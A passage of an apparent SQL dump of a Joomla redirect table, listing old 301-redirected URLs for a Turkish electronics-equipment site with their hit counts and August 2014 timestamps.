00:00:00',301),(2864,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=117&Itemid=128','','','',1,0,'2014-08-14 19:13:25','0000-00-00 00:00:00',301),(2865,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=category&id=56&Itemid=137&lang=en','','','',2,0,'2014-08-14 19:20:05','0000-00-00 00:00:00',301),(2866,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=136&Itemid=138&lang=tr','','','',3,0,'2014-08-14 19:26:06','0000-00-00 00:00:00',301),(2867,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=117:optik-cihaz-temizleyicileri&catid=40:temizleme&Itemid=128&lang=tr','','','',4,0,'2014-08-14 19:29:40','0000-00-00 00:00:00',301),(2868,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=151:le40&catid=58:dusuk-hizli-smd-dizgi&Itemid=152&lang=en','','','',12,0,'2014-08-14 19:31:55','0000-00-00 00:00:00',301),(2869,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=96&Itemid=107&lang=tr','','','',5,0,'2014-08-14 20:47:59','0000-00-00 00:00:00',301),(2870,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=149:cs40&catid=58:dusuk-hizli-smd-dizgi&Itemid=150&lang=tr','','','',10,0,'2014-08-14 21:17:22','0000-00-00 00:00:00',301),(2871,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=105:r-500&catid=41:smd-firin&Itemid=112&lang=tr','','','',5,0,'2014-08-14 21:23:56','0000-00-00 00:00:00',301),(2872,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=167:lr4&catid=41:smd-firin&Itemid=163&lang=tr','','','',4,0,'2014-08-14 21:37:55','0000-00-00 00:00:00',301),(2873,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=40:temizleme&Itemid=60&layout=default&lang=tr','','','',7,0,'2014-08-14 21:49:09','0000-00-00 00:00:00',301),(2874,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/en/soldering','','','',1,0,'2014-08-14 21:54:12','0000-00-00 00:00:00',301),(2875,'http://led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=95&Itemid=106&lang=en','','','',4,0,'2014-08-14 22:04:18','0000-00-00 00:00:00',301),(2876,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=97&Itemid=108','','','',3,0,'2014-08-14 22:09:28','0000-00-00 00:00:00',301),(2877,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=140&Itemid=142&lang=tr','','','',140,0,'2014-08-14 22:38:38','0000-00-00 00:00:00',301),(2878,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=44:pota&Itemid=56&layout=default&lang=tr','','','',10,0,'2014-08-14 22:45:23','0000-00-00 00:00:00',301),(2879,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=107&Itemid=118&lang=en','','','',4,0,'2014-08-14 22:56:40','0000-00-00 00:00:00',301),(2880,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=157:spartan-8s8d&catid=44:pota&Itemid=158&lang=en','','','',4,0,'2014-08-14 22:59:59','0000-00-00 00:00:00',301),(2881,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=112&Itemid=123&lang=tr','','','',4,0,'2014-08-14 23:19:28','0000-00-00 00:00:00',301),(2882,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=105&Itemid=112&lang=tr','','','',1,0,'2014-08-14 23:30:16','0000-00-00 00:00:00',301),(2883,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=110:ekonomik-flux-giderici-pro&catid=40:temizleme&Itemid=121&lang=en','','','',9,0,'2014-08-14 23:37:35','0000-00-00 00:00:00',301),(2884,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=82&Itemid=38&lang=en','','','',7,0,'2014-08-14 23:38:56','0000-00-00 00:00:00',301),(2885,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=158:14fsfd&catid=44:pota&Itemid=159&lang=tr','','','',9,0,'2014-08-14 23:41:38','0000-00-00 00:00:00',301),(2886,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=56&Itemid=137&lang=en','','','',4,0,'2014-08-14 23:46:08','0000-00-00 00:00:00',301),(2887,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=117:optik-cihaz-temizleyicileri&catid=40:temizleme&Itemid=128&lang=en','','','',10,0,'2014-08-14 23:54:52','0000-00-00 00:00:00',301),(2888,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=82&Itemid=38&lang=en','','','',5,0,'2014-08-14 23:57:35','0000-00-00 00:00:00',301),(2889,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=167:lr4&catid=41:smd-firin&Itemid=163&lang=tr','','','',7,0,'2014-08-15 00:17:38','0000-00-00 00:00:00',301),(2890,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=141&Itemid=143&lang=en','','','',2,0,'2014-08-15 00:24:01','0000-00-00 00:00:00',301),(2891,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=82&Itemid=38&lang=en','','','',6,0,'2014-08-15 00:26:45','0000-00-00 00:00:00',301),(2892,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=43&Itemid=2&lang=en','','','',4,0,'2014-08-15 00:35:39','0000-00-00 00:00:00',301),(2893,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=42&Itemid=27&lang=en','','','',7,0,'2014-08-15 00:39:22','0000-00-00 00:00:00',301),(2894,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=85:neocut&catid=51:neo&Itemid=97&lang=tr','','','',6,0,'2014-08-15 00:45:36','0000-00-00 00:00:00',301),(2895,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=72&Itemid=78&lang=en','','','',2,0,'2014-08-15 01:02:10','0000-00-00 00:00:00',301),(2896,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=160&Itemid=161&lang=tr','','','',2,0,'2014-08-15 01:12:13','0000-00-00 00:00:00',301),(2897,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=157&Itemid=158&lang=en','','','',7,0,'2014-08-15 01:16:08','0000-00-00 00:00:00',301),(2898,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=124&Itemid=130','','','',130,0,'2014-08-15 01:20:38','0000-00-00 00:00:00',301),(2899,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=110&Itemid=121&lang=tr','','','',4,0,'2014-08-15 01:23:03','0000-00-00 00:00:00',301),(2900,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=155:ct-3000n&catid=44:pota&Itemid=81&lang=en','','','',10,0,'2014-08-15 01:34:28','0000-00-00 00:00:00',301),(2901,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=137:chip-max-rosh-rdy&catid=56:rework-stasyonlari&Itemid=139&lang=en','','','',8,0,'2014-08-15 01:39:27','0000-00-00 00:00:00',301),(2902,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=151&Itemid=152&lang=tr','','','',3,0,'2014-08-15 01:41:27','0000-00-00 00:00:00',301),(2903,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=114&Itemid=124&lang=en','','','',3,0,'2014-08-15 01:44:55','0000-00-00 00:00:00',301),(2904,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=97&Itemid=108&lang=en','','','',3,0,'2014-08-15 01:49:05','0000-00-00 00:00:00',301),(2905,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=116&Itemid=127&lang=en','','','',4,0,'2014-08-15 01:50:47','0000-00-00 00:00:00',301),(2906,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=126&Itemid=133&lang=tr','','','',5,0,'2014-08-15 01:51:46','0000-00-00 00:00:00',301),(2907,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=111:stencil-temizleme-bga&catid=40:temizleme&Itemid=122&lang=tr','','','',6,0,'2014-08-15 01:53:14','0000-00-00 00:00:00',301),(2908,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=49&Itemid=61&lang=tr','','','',5,0,'2014-08-15 02:02:35','0000-00-00 00:00:00',301),(2909,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=54:pcb-ve-stensil-temizleme-makineleri&Itemid=114&layout=default','','','',10,0,'2014-08-15 02:23:38','0000-00-00 00:00:00',301),(2910,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=47:aoi&Itemid=1&layout=default','','','',5,0,'2014-08-15 02:30:23','0000-00-00 00:00:00',301),(2911,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=53&Itemid=110','','','',6,0,'2014-08-15 02:39:23','0000-00-00 00:00:00',301),(2912,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=137&Itemid=139&lang=en','','','',2,0,'2014-08-15 02:41:15','0000-00-00 00:00:00',301),(2913,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=149&Itemid=150&lang=en','','','',2,0,'2014-08-15 02:52:40','0000-00-00 00:00:00',301),(2914,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=73&Itemid=82&lang=tr','','','',2,0,'2014-08-15 02:57:12','0000-00-00 00:00:00',301),(2915,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=108&Itemid=119&lang=tr','','','',6,0,'2014-08-15 02:58:58','0000-00-00 00:00:00',301),(2916,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=89&Itemid=101&lang=en','','','',3,0,'2014-08-15 03:06:58','0000-00-00 00:00:00',301),(2917,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=111&Itemid=122&lang=en','','','',3,0,'2014-08-15 03:08:30','0000-00-00 00:00:00',301),(2918,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=46&Itemid=62&lang=en','','','',5,0,'2014-08-15 03:08:38','0000-00-00 00:00:00',301),(2919,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=158&Itemid=159&lang=en','','','',2,0,'2014-08-15 03:12:19','0000-00-00 00:00:00',301),(2920,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=127&Itemid=134&lang=tr','','','',5,0,'2014-08-15 03:15:23','0000-00-00 00:00:00',301),(2921,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=146:manual-printer&catid=57:screen-printer&Itemid=148&lang=tr','','','',6,0,'2014-08-15 03:15:24','0000-00-00 00:00:00',301),(2922,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=82&Itemid=38&lang=en','','','',2,0,'2014-08-15 03:19:57','0000-00-00 00:00:00',301),(2923,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=58&Itemid=149&lang=en','','','',2,0,'2014-08-15 03:26:50','0000-00-00 00:00:00',301),(2924,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=115:kutulanmis-hava-air&catid=40:temizleme&Itemid=126&lang=tr','','','',2,0,'2014-08-15 03:37:31','0000-00-00 00:00:00',301),(2925,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=42&Itemid=27&lang=en','','','',4,0,'2014-08-15 03:37:53','0000-00-00 00:00:00',301),(2926,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=150&Itemid=151&lang=en','','','',4,0,'2014-08-15 03:44:24','0000-00-00 00:00:00',301),(2927,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=156:lf-350b&catid=44:pota&Itemid=157&lang=tr','','','',6,0,'2014-08-15 03:45:56','0000-00-00 00:00:00',301),(2928,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=90&Itemid=102&lang=tr','','','',4,0,'2014-08-15 03:46:53','0000-00-00 00:00:00',301),(2929,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=115&Itemid=126&lang=en','','','',11,0,'2014-08-15 03:47:24','0000-00-00 00:00:00',301),(2930,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=149:cs40&catid=58:dusuk-hizli-smd-dizgi&Itemid=150&lang=tr','','','',3,0,'2014-08-15 03:48:14','0000-00-00 00:00:00',301),(2931,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=105&Itemid=112&lang=tr','','','',3,0,'2014-08-15 03:50:32','0000-00-00 00:00:00',301),(2932,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=158:14fsfd&catid=44:pota&Itemid=159&lang=en','','','',3,0,'2014-08-15 03:51:28','0000-00-00 00:00:00',301),(2933,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=46:konveyorler&Itemid=62&layout=default&lang=tr','','','',6,0,'2014-08-15 04:01:17','0000-00-00 00:00:00',301),(2934,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=105:r-500&catid=41:smd-firin&Itemid=112&lang=tr','','','',4,0,'2014-08-15 04:02:00','0000-00-00 00:00:00',301),(2935,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=167&Itemid=163&lang=en','','','',3,0,'2014-08-15 04:09:39','0000-00-00 00:00:00',301),(2936,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=42:th-dizgi&Itemid=27&layout=default&lang=en','','','',8,0,'2014-08-15 04:11:11','0000-00-00 00:00:00',301),(2937,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=168:aoibilgi&catid=47:aoi&Itemid=58&lang=en','','','',5,0,'2014-08-15 04:15:00','0000-00-00 00:00:00',301),(2938,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=55:katalog&Itemid=1&layout=default&lang=tr','','','',8,0,'2014-08-15 04:16:07','0000-00-00 00:00:00',301),(2939,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=105:r-500&catid=41:smd-firin&Itemid=112&lang=en','','','',4,0,'2014-08-15 04:17:18','0000-00-00 00:00:00',301),(2940,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=136:chipper-smd-500&catid=56:rework-stasyonlari&Itemid=138&lang=tr','','','',6,0,'2014-08-15 04:24:13','0000-00-00 00:00:00',301),(2941,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=57:screen-printer&Itemid=145&layout=default','','','',6,0,'2014-08-15 04:26:29','0000-00-00 00:00:00',301),(2942,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=116:sogutucu-sprey-frz&catid=40:temizleme&Itemid=127&lang=en','','','',6,0,'2014-08-15 04:27:15','0000-00-00 00:00:00',301),(2943,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=110:ekonomik-flux-giderici-pro&catid=40:temizleme&Itemid=121&lang=tr','','','',4,0,'2014-08-15 04:30:43','0000-00-00 00:00:00',301),(2944,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=136:chipper-smd-500&catid=56:rework-stasyonlari&Itemid=138&lang=en','','','',9,0,'2014-08-15 04:32:36','0000-00-00 00:00:00',301),(2945,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=58&Itemid=149','','','',7,0,'2014-08-15 04:34:07','0000-00-00 00:00:00',301),(2946,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=article&id=116&Itemid=127&lang=en','','','',45,0,'2014-08-15 04:34:07','0000-00-00 00:00:00',301),(2947,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=168:aoibilgi&catid=47:aoi&Itemid=58&lang=en','','','',8,0,'2014-08-15 04:42:07','0000-00-00 00:00:00',301),(2948,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=36:orta-hizli&Itemid=37&layout=default&lang=tr','','','',9,0,'2014-08-15 04:43:08','0000-00-00 00:00:00',301),(2949,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=138:flo-master-z-&catid=56:rework-stasyonlari&Itemid=140&lang=en','','','',8,0,'2014-08-15 04:45:22','0000-00-00 00:00:00',301),(2950,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/archived-articles/2011','','','',33,0,'2014-08-15 04:46:14','0000-00-00 00:00:00',301),(2951,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=49&Itemid=61&lang=en','','','',5,0,'2014-08-15 04:48:49','0000-00-00 00:00:00',301),(2952,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=46&Itemid=62&lang=tr','','','',2,0,'2014-08-15 04:59:21','0000-00-00 00:00:00',301),(2953,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=139&Itemid=141&lang=en','','','',2,0,'2014-08-15 05:06:30','0000-00-00 00:00:00',301),(2954,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=164:ews-310&catid=44:pota&Itemid=160&lang=en','','','',11,0,'2014-08-15 05:07:10','0000-00-00 00:00:00',301),(2955,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=60:ikinciel&Itemid=164&layout=default','','','',4,0,'2014-08-15 05:10:07','0000-00-00 00:00:00',301),(2956,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=176:jvk1&catid=60:ikinciel&Itemid=164&lang=tr','','','',9,0,'2014-08-15 05:14:37','0000-00-00 00:00:00',301),(2957,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=175:rh2&catid=60:ikinciel&Itemid=164&lang=en','','','',5,0,'2014-08-15 05:14:39','0000-00-00 00:00:00',301),(2958,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=126:e-katalog&catid=55:katalog&Itemid=133&lang=en','','','',5,0,'2014-08-15 05:22:19','0000-00-00 00:00:00',301),(2959,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=46&Itemid=0&lang=en','','','',1,0,'2014-08-15 05:26:24','0000-00-00 00:00:00',301),(2960,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=141:marksman&catid=56:rework-stasyonlari&Itemid=143&lang=tr','','','',5,0,'2014-08-15 05:29:56','0000-00-00 00:00:00',301),(2961,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=40:temizleme&Itemid=60&layout=default&lang=en&limitstart=10','','','',4,0,'2014-08-15 05:31:06','0000-00-00 00:00:00',301),(2962,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=157&Itemid=158','','','',5,0,'2014-08-15 05:35:18','0000-00-00 00:00:00',301),(2963,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=110&Itemid=121&lang=tr','','','',3,0,'2014-08-15 05:38:22','0000-00-00 00:00:00',301),(2964,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=39:lehimleme&Itemid=57&layout=default&lang=en','','','',7,0,'2014-08-15 05:43:43','0000-00-00 00:00:00',301),(2965,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=168&Itemid=58&lang=tr','','','',5,0,'2014-08-15 05:45:06','0000-00-00 00:00:00',301),(2966,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=55:katalog&Itemid=1&layout=default','','','',5,0,'2014-08-15 05:53:40','0000-00-00 00:00:00',301),(2967,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=140&Itemid=142','','','',6,0,'2014-08-15 06:04:07','0000-00-00 00:00:00',301),(2968,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=114&Itemid=124&lang=tr','','','',3,0,'2014-08-15 06:05:53','0000-00-00 00:00:00',301),(2969,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=54&Itemid=114&lang=tr','','','',2,0,'2014-08-15 06:09:42','0000-00-00 00:00:00',301),(2970,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=46&Itemid=62','','','',5,0,'2014-08-15 06:19:45','0000-00-00 00:00:00',301),(2971,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=115&Itemid=126&lang=tr','','','',2,0,'2014-08-15 06:20:26','0000-00-00 00:00:00',301),(2972,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=107&Itemid=118&lang=en','','','',6,0,'2014-08-15 06:21:12','0000-00-00 00:00:00',301),(2973,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=91:osai-neo&catid=1:son-haberler&Itemid=28&lang=tr','','','',7,0,'2014-08-15 06:26:46','0000-00-00 00:00:00',301),(2974,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=43&Itemid=2','','','',6,0,'2014-08-15 06:35:52','0000-00-00 00:00:00',301),(2975,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=156&Itemid=157&lang=en','','','',3,0,'2014-08-15 06:43:27','0000-00-00 00:00:00',301),(2976,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=139:flo-master-ii&catid=56:rework-stasyonlari&Itemid=141&lang=tr','','','',3,0,'2014-08-15 06:54:11','0000-00-00 00:00:00',301),(2977,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=36:orta-hizli&Itemid=37&layout=default','','','',3,0,'2014-08-15 07:07:09','0000-00-00 00:00:00',301),(2978,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=55&Itemid=1&lang=tr','','','',2,0,'2014-08-15 07:26:25','0000-00-00 00:00:00',301),(2979,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=117:optik-cihaz-temizleyicileri&catid=40:temizleme&Itemid=128&lang=tr','','','',5,0,'2014-08-15 07:27:11','0000-00-00 00:00:00',301),(2980,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&layout=blog&id=1&Itemid=50&lang=tr&limitstart=5','','','',4,0,'2014-08-15 07:31:47','0000-00-00 00:00:00',301),(2981,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=93&Itemid=104&lang=en','','','',4,0,'2014-08-15 07:32:38','0000-00-00 00:00:00',301),(2982,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=160:gf-12-hcht&catid=41:smd-firin&Itemid=161&lang=en','','','',3,0,'2014-08-15 07:40:15','0000-00-00 00:00:00',301),(2983,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=172:avb1&catid=60:ikinciel&Itemid=164&lang=tr','','','',3,0,'2014-08-15 07:51:47','0000-00-00 00:00:00',301),(2984,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=47&Itemid=1','','','',6,0,'2014-08-15 07:57:10','0000-00-00 00:00:00',301),(2985,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=125&Itemid=131&lang=tr','','','',4,0,'2014-08-15 08:03:36','0000-00-00 00:00:00',301),(2986,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=80:cm101&catid=43:ultra-hizli&Itemid=87&lang=tr','','','',3,0,'2014-08-15 08:05:38','0000-00-00 00:00:00',301),(2987,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=164&Itemid=160&lang=tr','','','',4,0,'2014-08-15 08:32:35','0000-00-00 00:00:00',301),(2988,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=157:spartan-8s8d&catid=44:pota&Itemid=158','','','',8,0,'2014-08-15 08:37:12','0000-00-00 00:00:00',301),(2989,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=44&Itemid=56&lang=en','','','',2,0,'2014-08-15 08:44:54','0000-00-00 00:00:00',301),(2990,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=72&Itemid=78&lang=en','','','',5,0,'2014-08-15 08:48:29','0000-00-00 00:00:00',301),(2991,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=article&id=107&Itemid=118&lang=en','','','',10,0,'2014-08-15 08:54:58','0000-00-00 00:00:00',301),(2992,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=120:trident&catid=54:pcb-ve-stensil-temizleme-makineleri&Itemid=116&lang=en','','','',7,0,'2014-08-15 08:56:30','0000-00-00 00:00:00',301),(2993,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=85:neocut&catid=51:neo&Itemid=97&lang=tr','','','',4,0,'2014-08-15 08:59:37','0000-00-00 00:00:00',301),(2994,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=126:e-katalog&catid=55:katalog&Itemid=133&lang=tr','','','',8,0,'2014-08-15 09:30:30','0000-00-00 00:00:00',301),(2995,'http://www.led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=82&Itemid=38&lang=en','','','',1,0,'2014-08-15 09:36:49','0000-00-00 00:00:00',301),(2996,'http://www.led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=158:14fsfd&catid=44:pota&Itemid=159&lang=en','','','',1,0,'2014-08-15 09:48:00','0000-00-00 00:00:00',301),(2997,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=116:sogutucu-sprey-frz&catid=40:temizleme&Itemid=127&lang=tr','','','',4,0,'2014-08-15 09:56:13','0000-00-00 00:00:00',301),(2998,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=43:ultra-hizli&Itemid=2&layout=default&lang=tr','','','',9,0,'2014-08-15 10:00:43','0000-00-00 00:00:00',301),(2999,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=51&Itemid=92','','','',8,0,'2014-08-15 10:05:26','0000-00-00 00:00:00',301),(3000,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=73&Itemid=82&lang=tr','','','',2,0,'2014-08-15 10:13:11','0000-00-00 00:00:00',301),(3001,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=145:asp-300&catid=57:screen-printer&Itemid=147','','','',1,0,'2014-08-15 10:17:47','0000-00-00 